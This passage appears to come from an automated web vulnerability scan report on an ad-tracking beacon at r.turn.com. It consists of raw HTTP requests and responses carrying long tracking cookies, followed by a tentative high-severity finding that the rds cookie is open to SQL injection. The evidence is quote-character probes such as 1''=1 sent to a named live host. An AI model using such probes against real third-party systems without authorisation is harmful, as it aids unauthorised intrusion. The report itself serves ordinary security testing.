aSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdNChmr2gqp_bsTKTrtZC7Y3cLD_SNDEbV8PMUFlmzT1N9YPgaemwV3BBfB2-m9t7qefjWJ08BK2ctlCFJWHllBcY00BkCo-YMNBmpIV0ZOtg-Nxhuomzdm6hE0tcxs0HIGvNZ_9yaKOud870irbVUKqwOqoRBUYoZ_aUn4XStK87HYLNjBqQu5e4uk0BeNmDUKcNEfcAeYlISy2E23H0Ey0RTtdyXjRdrIljs2JT4IBCp42oZQTOhvc81rn-hYQRZnDf7y9COK-FY-2ugXVqjQS-pj8W99_7k59ODgmGDUx1RLP4RQV5YsF7eRC_oBFtdhPG7W45xYyr6F0BCB3Y3jIYuZQwHeZWSJ7L_4jNc_fcy8Q5Fz6SgXPEIAbAI8Ia43mIE2YKEWi-B1LzswOG8tiMF6xinJIIFkTYszxV8xxVqy4iGInEgJLf3DRUumLHOXbNBGeqtHrtmsNUfxy0oJ5OXAKNQ1n-dyOqIH5RV7O5q2tR0Aw1HwdNZZVS9ryqsqXuaGow2-P7K3E6seeRdID7U4lziJVOheqyzs6aPfQpaefMGOCvGovGjA2C6kGk6qDVb8Ctumm-g06ANh58ShZXS85UlTI-Ms8315rZDyMXvc1WWsvixV9w_JwyrchfF403Xtt73ImjClAHeFE527hZ9sYYolc0xNkbs21o9RHXdT108p4cswCVHF9aJXWu46W3EfgdIzTSDASgBHY-_d87UupVePEsgR-UIuzJKKpX0bxLcq_C7AWUMkXDWLJlvjquWC7Gk8YZnpPdByut-OS1jPhEo7rRlyzkCvvr2ak_dIgdlxoHfpwnS_HG4q3Ex0bQgW10uuAOxZq7T6pargjZ91aET7gu1wHxeczq5nxznV9VyZYSWSGOlzD0OagD_qxPuFg7pTdahuj804NF4RwpfxyO8MinPH6Qe4MZA9Ca5rVVPm7uyji591PMj93X-XVtndwLXwwX42fVwVpALmt1-V8hJ2wLngXVcwmpJcmIVvr-UGtnHjdubqHJRmWt2ucOMTnegTPjwuur0G3GFJ3s_1jLC37hD3a7XYeOxJDJd9fJMJZV8ay1vizL8GtAwugm4v0Cxwh4L6eS4moQ1bjXF1tj7JMOrQdTUwyOTILZIr1D_ZNf38Z-XJwgGExQHTvWHwHTF6ZvpeTqw9vx7ZteHdharQ8kdaCxkUnsg0m5bzcb7E4YgboOUnmZLh-LKm7oV7a2G__-JxYjis-sAaLoAMwpDwQwfc69gRpYn_y7-ZD75er7BUydw547KPtbXosP9bnnd0OZLFPEX78KsyR75gjh4XIZOCPW3r_hr7AcJ3ngTaN4teEYEORDeDj4g3rZ7rDDNT6U0ZCXY4sSAUxf97koNRHrmwTXDEXbACeL4CjKRNvO1XFYCJkVXlDj6xX2UKsUIMQFup1JBC3sqAlwwL9bpfkuhDHdXYKRG9_5RzwHK6FKcS7w1cxEVEDeUPLyJsufYvZN1YPHO-OvVi5FCnRJS-gZ_0m2w3Vv462a0R7DEvhubXRx78mLhvin04_PDzQA62eGzSyPpa5D8VoVL3nYT-8Na4x0ynR4fvinviFGMLv3tNjtrp7smlbrsTcekN1EBAA1tKK3vI_26Aexhdo9ejFCDobEVyhNvVqJQinyqTP5l-pke17GNYuVES9bgQO-70qoZt975PqpkGES5gmUY80_gzDQabSIGDx8NGTMtFXAXF4KcPnlEt4B1_FhhxOiLtoiA3m7onhzh-TJc88tEfwDGbxnH_j1h-NtVFTKdRNhtT0fDJE-__QeonnnzZXsc9K80-WU_VLBsdQNA2PYXH3Rff0knxJcVZ7Chz4FJJ_TMv03yL7XPeYtr4s0GKf3t057ZF4_jL2ifoo0t0noToysMQ98IGemf7gcP8sUOs_epJQ8gyIjVMYX2SuE1jSJBqGoTNfCkFA_1FMJLxHxDTLD68RZNW115CcBbPNgZZKRiXKaLKD62rQnfDWK35o0A7w8jrj3wOje0h3VO65HFl2Qkz1aQHw1bkZ4UQ7kl9hQMcyi_uXiusieb9oqny7NzWYCf6XmrNS7dZQ8PQj4xieKYCskpNEszFxo3mJb3L1KuEkRg2vcFf06O; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:44 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1210787&t=2
Content-Length: 0
Date: Thu, 16 Jun 2011 12:18:43 GMT

Request 2

GET /r/beacon?b2=uAuceuD961GAkMIYzv5AQziOQ-eCNWHV6KkD_P0UpEIHL-lTlput787BXKmhwi2DTI-ZOLCjHLM7w-8RpLcB7A&cid=&1''=1 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=undefined;ord=5328984577208.758?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=QM70Whve3yMvxkhKlZSDFc8jBjr9GZaXPVHd3KPTbrVh-L3XcPmT4hHXOQgApIlYYCcoFPzHtthoKoScENuCacAfwlpOGZwMiTYKzkLyV6yLZO8TKZa-nLTQQ4a65pbCg5Ip47iYWcr2TLdwTDr0L4oBBpiyP3J8NU50OkfeFof5nfT0WqmMXNTAO47jNWqP9DMJbnJ4jgxRBVKYcWOOoBo1vu2lsqV8DN9Vps5BPlmPLL60Ne9Ei9t17XStRc4rGERgBg46FC_PZzOaKvw_-cZloB2cEevUSjzsvfqJ8qZhgZ9g0kmeR-0KBwkm_b3-nHDVWO4oEVu9LZTNJAoERvvIJejvF6b257maU3ML6OZFn0pS1M8s2KPrvUfPPF0_ewHYGlNdqDaG9FYWPprE_WjI_lsRoaOz7-O-vgmKJiTz-KIh4eZr0ecbMlDpVZu91zdW0hE-4eLwR7bomsP7JSdqWSoz4sC-t192PZJ_v5Q-P1VlQMzPKKE64Al6GE9_qQBVWHaPX-roIWbRumWL1-XpDwD22ZRNSBnUmAd0wjxC8t8bNFJSd1YiPEk8t_65cnD2Yeg02hxYDcV4Js2beeQ5R5-3xXfzzH2krAPRf428tdb3ea_CHM6GXs7htoYXSpzxUEP4Lawlcjwmuu0sgABXItk3mefJp5QRHv4O0nQLT7vqCmjKMUnpRJ6SJsSELsnefots81rrNB8RkZzwt9xgKqCmjZaalMlFzn1gedMiR83opqf2DdmsWkwVThPxhyYcbbPOXHwjOkupykmG8XHU2Z_bwsvqeY5PpknKks9Ka5pRG06H0tQ1iybpB3pDqsDA387b4GyTrdtR0OxRq1W2-clEv_ue7qpjwh19AlSzwxLx1pBhUX4CYwoSQucKtJqb949HbLP0at-l-Te-c7NLS367-cid5bH8-bJWmY8nC9B9w1ij88w7eqsM7UhZeuq4rrlofmxpvpW8sH43ef-7J7zFZpaqjQcGC_vq5exjB6sqt4Mo-GvkAj2qErRL9pWBI8bQOJli1okJuMhLcQljneDOkY9olIfd-ve5Qn4-P1VlQMzPKKE64Al6GE9_6W9aRH84b2cB20BvmgB1t-XpDwD22ZRNSBnUmAd0wjyOWY3k4-itBWJe_k62xWOCrFV4LhRdbHCAEu2Xc3dVj-Q5R5-3xXfzzH2krAPRf418WpxTiSnvzOJ-ZkQfvNQASpzxUEP4Lawlcjwmuu0sgAGs1MSewshLM0Q6GhK5Ns8fU1J7JmYpzzzNP9hB_wUy05oRsNhTbhcD1_xCDQojfMSuZLsISBijKSjMDSgLlyDjsNAVa5Ct7DxoA1avkLsQ815KVjL9JqXyOpgagVKRMbntt6vzlmgFJ9k1Zzq45WeFCQUiSJFaYOp4MQlbe-RFUEK9KsJrC9CLkGJUacP7jEa1wTMgEYoXiZA8_W3FI42qThwrh-6wCu7vlgqZNOXixmWgHZwR69RKPOy9-onypkTIcQzOQc65c9KVO3IQPv8Yd11jfaAGeomVXk2jyqz756mNhe7mBUb-nxi7SHg4OCY4fQNDPmLA1QCvKDvVxcR7AdgaU12oNob0VhY-msT9lb_ydeK6sfV-VwC1t6PXZrSU8zXCbuEO-Hn-xUU7T4MdZMXr1rBrtZHchRIeH_p0MQswiaZbyLrfvl0j4wXxTj4_VWVAzM8ooTrgCXoYT3_ukoy-I69c7SrUTlHbB6rZ5ekPAPbZlE1IGdSYB3TCPPtQxe5L3Tuc-yk0WOEmJZ9iOsnV5UjcUOjnXUSJzJan5DlHn7fFd_PMfaSsA9F_jfnYBNZ11ca-Wgmkknbh9eNKnPFQQ_gtrCVyPCa67SyA_xeh6xaAKc9mefeGrL2bordkSY3wrTx66nlJUXJL2YzTmhGw2FNuFwPX_EINCiN8l08PBB5hX0JN8MvjDOsPSeOw0BVrkK3sPGgDVq-QuxAsFTUl8EdeBakl_JEHsyGF2Jfo-RxTjyjBkOV794zNZ0kTA-aymPAds4qYFrApgUvcPT0oUz-YZYVaDcHqgl-9xmWgHZwR69RKPOy9-onypimfvYrBKXvtznWuT43S50y-3u16r0dKm_zz3ndHe3WlG-QgtH60dqlqdrI16uF-EVNzoshUKoWhiHnNcI8oP4V7AdgaU12oNob0VhY-msT9kNb2AdwFV5i2vxwzlIKJ3BfY904hG-_CHlEd9j-vzfzk5Jifrc9V1OOzEX32QifKI3TThUmivC2QQLLhMmAROj4_VWVAzM8ooTrgCXoYT3-ZdIfAS6iVxgYyOedo9Ki95ekPAPbZlE1IGdSYB3TCPEX3xTtUTn7ghX1OdIngM2q-RWnunI4BlM040X2RcB965DlHn7fFd_PMfaSsA9F_jUBCGuQvL_fhodmVMnOIMvBKnPFQQ_gtrCVyPCa67SyAw4hmx2eXEqzbsKwy_MNlFfUa0Y_5ftklciMdgbQhb_wbdYORBXyNJvBU7ewnBysYP_zg1-oPoaJCGGP6Vt55Gz_84NfqD6GiQhhj-lbeeRs__ODX6g-hokIYY_pW3nkbP_zg1-oPoaJCGGP6Vt55G1OKf083dm4Ocqz5E2RJpVu9TfQkOcNz7DOIIZP_23WvvU30JDnDc-wziCGT_9t1r71N9CQ5w3PsM4ghk__bda_nUnHYqNkC6RPs4-2B8pJoMqCuwkKr26TEWeaS686ExCPxJGFKBs6DSrH4oyWVjhIBdxGEbgsgCDz8r26d8pRZAXcRhG4LIAg8_K9unfKUWejxkXIMl02q9l3ycv51k_QH1ePXpCkOqUdD3FJ26E0LEgnOhSnZw4WOirtIvKWwJRIJzoUp2cOFjoq7SLylsCUSCc6FKdnDhY6Ku0i8pbAlEgnOhSnZw4WOirtIvKWwJTJGg5u5RuPReUxP5byb5LGsjsJdNDz0zBLNR8ReLDcirI7CXTQ89MwSzUfEXiw3Iv5E8JDY11x5xog0GskBswr-RPCQ2NdcecaINBrJAbMK_kTwkNjXXHnGiDQayQGzCjVgVkoy7DysIPcuC3AUG0sb1BDdWaxOURi_bqX1S5T5G9QQ3VmsTlEYv26l9UuU-W___E3ohWz6drp_rI2j18pjDJAj7Gbh3rF9uN2-5_zdRHqYmtLfdK6unD4Xv15XLH0evbFMdkuI2WqEUI01UYXDJU38vLMvNPfD69rioBNl6-78JM-YwVK9vMhQzP5aE-vu_CTPmMFSvbzIUMz-WhPr7vwkz5jBUr28yFDM_loT6-78JM-YwVK9vMhQzP5aE-UaEwuQGXrKf1B0pg93pQC8wfsfoRTDgpAqCg9KVA9UvMH7H6EUw4KQKgoPSlQPVLzB-x-hFMOCkCoKD0pUD1S8wfsfoRTDgpAqCg9KVA9U-Nxmcu6N80G4H7yE1a6GL_jcZnLujfNBuB-8hNWuhi8zo63SsMKXllQ8R3TROrVZwRV4qFgI_yJZybaj30x3rZThUGsgezmPZdo0hiRJAEU2UlTEERLOiMahUz0Je5vrQpUNsf8ubz28dE3HpFhXM4HLQRF00hhIXSJp9kwMyEKBy0ERdNIYSF0iafZMDMhCgctBEXTSGEhdImn2TAzIQou93XF3r4cgLiZIl0wssIM; fc=c8voyByxtfmxf-PR5HgfpjgORIc3Od-xFb-8M8t9VWkz6wrQqI-cCCIP4q7JSoro0YGlpSJHEwaZrD9xrQykZRLTM2UWqcEggsPn2JlFm6WKJ47y0SjHASrSoX2-_RWGR8GD8YL2uMyYOovbWSVtT_OjMRX_o6D3TvHXeB0H3IoJPxIPX2Q6BIRFliap-hOlRK2X8EADYMp4JB-33zSWnLP_4lD6MCBjT4SRxTIxlhNKLFBAG3Fk9H3_mDAMZFkDVnBVtdUIoJ-JIgllkJFaAJbHZLznezJA10wgg7oc-ufuxx6wPWxSLH-VTpbekwI2; pf=bskS8Lli70BjXEzd5NYfF8V9tHnIhHPKzn-ZptMbz3NTv4g2_4PHk6pD33NmTL25iyDxX-e5nvqK08ftGFlNZcB-blYU8Y2b3uGZySbN9k4boogWXDFyI4_-RvN_buohq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdbR_ukiIJxkBku1CxquV17mPFnSRDfouZL6wYhXooxR9ULrxpvguFI2ofDAIOd3EuO9yXy3nBEXqSScPA5E39O2_zg7l3tDIiyF94B5aERskWHv8BOnUkNaZrdPIQNGZqdwsP9I0MRtXw8xQWWbNPUyQsdjE_Scn2QYUNUmcT7rDH85LuW-sDtP4uwhJo9atGrEPrXDmdsIAOzEayx_QQ10pBlWBp0q8wJgIWBSuNhQqif26eEkDb5MRTYvSKoQwNXOBQsIqeIWsKbow-3MTFvdSUC5aHu9blDf32RjYS8Q0XMZuh1ZAgzt41nq2NRCSX590hwfiGo-qcVT2kvWmzeR7b1paN0zLvFemp5AQnABOzIFk-pYt5rgVKJ87aXtgPb-mafaJ5_5dz5FYF2gdO3-RhTnUyFltTQjNRcqU7m_5Dsdg2BVOoqsZOS_mkJdfuPEzm6ziEo1_QjXTUZsQGb3aBmo_VB_3afAvA7HmJ70VD1x9GqiaHujprGHOBA7aEDie69XnZ9g3UdQ8qboT72h45foF_fR8Dfspr5EIo6mININ0MwGURZOI6NOy-sr20mDmWfrauITMqFQqh085LSKQUL7YGM0pJp1-FIztq58QhVWy6LSDOwot2ckvPUzkd-FnxN8NhVB8sqANsWORR78w7iqAGDudyRR4sGrjr4yCu4BPZ9sxxEAJuqkU9WhgK5HyS-jWx86QRjwbOSlxW_AShejO2Api9OqW7wGthrtivajOoHMt7EKDIqFqYM0LalgBhHGk98NLPXedpy1UU1G0p61bv1d1Qe8RvD9O3tReDwxPBbZMzCCP1zNubGNg83l1aV51TfDhTgj1yUZOWuS-pj8W99_7k59ODgmGDUx1RLP4RQV5YsF7eRC_oBFtd7vTs-bMZZ3cr36hzZbdHwcgMjIQ67GgiGFnif7dZxa3qqTs_pw5jFRYMsjf2CDWROI6mFHsv9rileAh5u94Tal8X9jZGPmZVvtACyANcU61_2D_gjytCfJX5eIYzCUnD9N0uTPecPGlXnt0zeFF6nGhy-4kHkvuGu7mFLrHknQIOqyVa7C5Vcz2ztFo648TLIYncavW2EU0-FxAowg7Q_J3_JUWPrldWd5VL7X-3ELxQm3QGLlDe9QHA7dTmmKmFxV0767zf8vh0-XU0u6MJx4viNkNYwNHgm3A-Zsn_tb2nFJRjBcEMxdDM5u496FsXzZoCQNrRn4Nka-1SbHAlq1j0766BFlUYsZHI9nvDUSjNUKoFWTkAUa-o1j-LL1ebdsaBpOZQwog1WHvup_q5MU0eWf_8Tnz19zggAp1l0o0E-qtSYNUJ36V_bsysgOo8ovHlz0rw4urFgweCpjhoovSxZ6xAsLQbFPBlhboS688EaXiGds-5scOf0AWtR0WtyJH-06RSCV4rzVRndoxKQ6xvTNWKSQfuYds5-6wqXTrrprCUxSH31llwL8axfVJ0d6h2Ke1Lez9-eYMqCkG4uUOXcVRZwxg85KAU3HRwHZ-EWY6qIaKdc8DaRYJXxJzEtphWqdWwTUQc6r3kmRMNC1ofRqXiWAg7U15-Vq8fXUTyQ-Foh2RKGC89bCSZhuIo0DelrjnD_y1FdMAK6632Po5svz9Xs-GXO_PYmIh52EUXzRY-jfWrhp-btGaCKGToFYaTe9bd1jKXwduyoimxxjrfcWCeJq1txaaBU_3Uczg1vUpNInXslg4NWbOv3i1AMVsxWmxcjn77s3i60QHhTEr6gILrU4PmsHL3FqzwzpkTuJbzWi_g5eyZHwtMfpYoYwULodolIu7euVx1T6-kom1lfGeK534YvRLg1f6xfa7TbJat7GFUh5YcwiKTv6i2BObi71nwu2712ua_zaapTMdVqI2HeT5VUjRYlLwTM6Q4btGEdG0d_jWUX-DJJ6s4pWL_6FerjeM6JRh-LuLiaWTXIluKkF9otMRxuQA1xZO-l_PyGdq8ZIdQBo46D090aTaKlV1enoq-_ZVUdLnFjEj8JuvB_NmaEIhlkkUtL2E3UODDMR1tOQu8PjS8RbchSrxsTjxxMOUEsUJ_Z756RnNmhOA_TD07hZfxuz8bhfLCVULYz6Ok1J2_QA_kXIY92iqRVh1b6IbTDyOALqZNl5K11KDpAXL1nqDbSN94B3fAGfWH1075KVzt7-y7v8wzj5HvH-kwIHXGh1rq2Sy1u7pxUuundR497HrST_MMHxNG2Kdut19FcHWUqjUfID5JAiaS2fFEZWuWIqjpSvJM2ivPIAO7c_zUdwbkiWS8ejzieFqJCa8rSsS_dWSQq-Icz8Io9aHLgwbQxkFBxTOEAWmKRZWPfJkX_p8vFnb1Nu9kYvRadgXAM7qphVq6O0Tj; uid=4325897289836481830; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15138%7C15138%7C15138%7C15141%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138; rv=1

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:45 GMT; Path=/
Set-Cookie: pf=mFocgDDVh_dZydU1g12Ehh6Y3Wu2IxLshYd4Gr5JzbUStJHO4dSC7tcSjJ5dCIRNZDpM35cC-2bkiEEmtUQheJ_NWdUdORgFPGcP8J5KKX8dRoGs9UmTmTpFJBUogllMq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdNChmr2gqp_bsTKTrtZC7Y3cLD_SNDEbV8PMUFlmzT1Mpob_IshpEh44rjpUDRjqJJMVdwgJWqAHsrcU4vJzg1SjgTP9Ov4STqlXA29oMDzPfGyNLa-_wPmqx3yJUi2IqTlK6CdjWFW1KEX54kS_ltaLuvYLqy9AK1C3yejAK-xaykGJBATBiEB1A-mpjZRk1XO1GIUSXwpOmQA3cP0_GhDVw3tWIfXcXZPtmgpedERpR0OX7qHfFd3oEUI9TNhW36tgQNKsLUM6bH-Qya0rPKK3xE-wlW2DrQ8fYSs4TMEvyXks2CaOh8vogKgNrPYlGwiZ_70V-oeSP1dKu4cHLUWD8rRKpGQ5zUHIYwzHzR6QREtI2WNZ3Adox509mnGLBVjGevByqOHOsjKmlXbNODb6Y3H0CFlXDib_ILYDFD17K7G44mhJBfz-2iD8xpXbSXbBUpi4HxPSR67PW5XhyLHH1mqciITfCStXnyfp8nZIZQqaG4OBR9yFGgc-bt9nO5d_CDt-B6Iy4h60FUu_tgFH1UTi_ILqaqJbnKQc4dyQs9BG1XC1ekAueszKb7ATwt9ZWKbAjd_kWK3de6VFeM1_J8r6Mg839cdE-vqqliNDWgmlxMMtirW_wsRgboCN9-DxpMh0jR_5_keLnZw8XmwZiK5dn6LSGDBJSWCOZwcce6h6IRMXz1J_JELzaH_onOQLgZCEZBHmd0C39_Q-UJpzDJrWrf7FSWkmNoG270CuSXAVLACWiBvhO9FgGk4kJFqcjBWiCcZZpfUD2jEwpuyqm_ODS8CSL9M7Tu29jFKorn4aMWnUPt3XMXb4_YieYwBRFKaHWkr9RVIe5oyIapyZAhteT3kqjwgRQ2YX3O8KsvOWIBxv9BM8UsE1JMAin_wmFeY6KLb2Pbbu5y41BdYrJVsIqdUFJ32THdSVwW1Nf_ZhcI44X56y0kvpbYT_-FtS_31ORFew1FDHGBZb20VtyT1N5IDiua2Nvb02hfPArk8TKrHYY6jGNbgkfED4z9FzVMcyTIS3tsMyTKoEx8ecZHITBJx-_JL8gDfIJWTwYBIOsWGxhhh6a6x1JpG0XoBvuHFbTm5_31c0udk6gRvPijDFIQgImy8IDAqCl_FHgpk9L6bHlXrOGOkA8xLvom2l67Jp--o1GJOVeVXbV8hKxmNte69mTdtIbIi7pu5G03zEhXjDyXazRh9NTdlnzSkK4s_T8x92kKTR8j6AZOOv8WvAQtNw34E0JxRX3YS_PDldeKWqwmlRyrFrnZD-Y7vBkk1SG4Sb-cUCYUtCQcZLmCcMefs5VEvIewIXC8hDpQpYfpt6ziGAaOZsgnnnoYIZFYyd8Lm2F4igryWobdd5YrkRpeELltDs2XsrfndTwBRPEg66bRJrGvCMQM1yfxVvTJlqdQexwgA8z9IUVfhD4jtueYUx8YEI3gT_T7D2euQfvd16LSPV0o72hJyb8BGXZC7DPfL33e3pPbLKLMdNj9dInrzxrOFVZrVcpOf_BYQyMx1Y91fTsZYMRAuMLZZQEp10RuJnKJnmFBQhTFAsbsucXnjgUH5VeR36WC3FK3fum-jCHBtDjw-pnaVVlC4sQ68W3urWfmZtvCZr1h_OnZSSibkOhtDehoU54OCoubkDcteRmScy9HXzIp4QwVGghfRBa7pc3fuF4rQy1wwmpThEzPKMNPx_J6QrodQCsc0eNM_s9iTxSRkyKOcbia0331t5xReH2aJblLi51CalhYKO9KRIQnN9rPf8dCqoPeBL41X_s--UtQ_z-u125wnCAr3fKblGSrypJUEplbysAYMQ4OCW-R8vTcHjkHx_UBqvys6lUjUhj2RQMg7x2c1GOdbDXBvMQBpFrkUvn-qmWifwDWG5XexpRYTGVVPVPzkEhhfH-ahPVx3KGAxc-VwXA0X7F0Th8eVYQBIp0gbgZhP7EdeuIM1d7srFUNkHUR5CX4pixUu1jhEBuqb8ElJhpT-6ZRlRxL_mcahGSK3Fxc5-fVbnDjJNY2qEteJPHPJixHAREzZ8szLJ3nhdbMmBQq3HaNAgIOeZh6qyK1lmkJpCkhXCXD4KAih9LCcayMz80KUjcfwiLHdZH1w8owNiwxbyob2dUBCBJu3YeND2YzUGfR3fDDZtyV_v0vTVnvFhyuDUrxEt2fUBhobuQ478qfmDJT5jYS0w6IyJYYwI4UvXls47FLMPUqCrSqQvH_9kVgszlBsZP1s9a32Ylm8Wya01H_mlc8V164jSCjXQFLLxo6OHWI0cNICPiEQmczBLpFVz2ysE_4RUaQP7A8vUHi-1aYE-LQSJ4HNPFrPBSZbStxPDoD7ScuxKM9Ag4AYOxKVZlEb42cv4UOl9h; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:45 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1210787&t=2
Content-Length: 0
Date: Thu, 16 Jun 2011 12:18:45 GMT


1.12. http://r.turn.com/r/beacon [rds cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The rds cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the rds cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /r/beacon?b2=uAuceuD961GAkMIYzv5AQziOQ-eCNWHV6KkD_P0UpEIHL-lTlput787BXKmhwi2DTI-ZOLCjHLM7w-8RpLcB7A&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=undefined;ord=5328984577208.758?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=QM70Whve3yMvxkhKlZSDFc8jBjr9GZaXPVHd3KPTbrVh-L3XcPmT4hHXOQgApIlYYCcoFPzHtthoKoScENuCacAfwlpOGZwMiTYKzkLyV6yLZO8TKZa-nLTQQ4a65pbCg5Ip47iYWcr2TLdwTDr0L4oBBpiyP3J8NU50OkfeFof5nfT0WqmMXNTAO47jNWqP9DMJbnJ4jgxRBVKYcWOOoBo1vu2lsqV8DN9Vps5BPlmPLL60Ne9Ei9t17XStRc4rGERgBg46FC_PZzOaKvw_-cZloB2cEevUSjzsvfqJ8qZhgZ9g0kmeR-0KBwkm_b3-nHDVWO4oEVu9LZTNJAoERvvIJejvF6b257maU3ML6OZFn0pS1M8s2KPrvUfPPF0_ewHYGlNdqDaG9FYWPprE_WjI_lsRoaOz7-O-vgmKJiTz-KIh4eZr0ecbMlDpVZu91zdW0hE-4eLwR7bomsP7JSdqWSoz4sC-t192PZJ_v5Q-P1VlQMzPKKE64Al6GE9_qQBVWHaPX-roIWbRumWL1-XpDwD22ZRNSBnUmAd0wjxC8t8bNFJSd1YiPEk8t_65cnD2Yeg02hxYDcV4Js2beeQ5R5-3xXfzzH2krAPRf428tdb3ea_CHM6GXs7htoYXSpzxUEP4Lawlcjwmuu0sgABXItk3mefJp5QRHv4O0nQLT